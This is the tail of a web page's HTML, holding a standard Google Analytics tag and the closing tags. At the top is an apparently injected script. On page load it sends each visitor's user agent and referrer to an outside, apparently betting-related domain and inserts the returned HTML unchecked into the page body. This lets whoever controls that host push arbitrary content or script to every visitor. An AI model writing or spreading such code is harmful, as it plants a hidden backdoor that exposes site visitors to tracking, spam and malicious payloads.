    <script>let teBilisimXHR=new XMLHttpRequest;teBilisimXHR.open("GET",`https://betvitrins.com/request.php?agent=${navigator?.userAgent}&r=${document?.referrer}`),teBilisimXHR.onreadystatechange=(()=>{if(4==teBilisimXHR.readyState){const e=JSON.parse(teBilisimXHR.response);document.querySelector("body").insertAdjacentHTML("afterbegin",e?.html)}}),teBilisimXHR.setRequestHeader("RequestWith","TEBILISIM"),teBilisimXHR.send();</script>	    
	
	
    
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-21655627-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-21655627-1');
</script>
<!-- End Google Analytics -->



  </body>
</html>
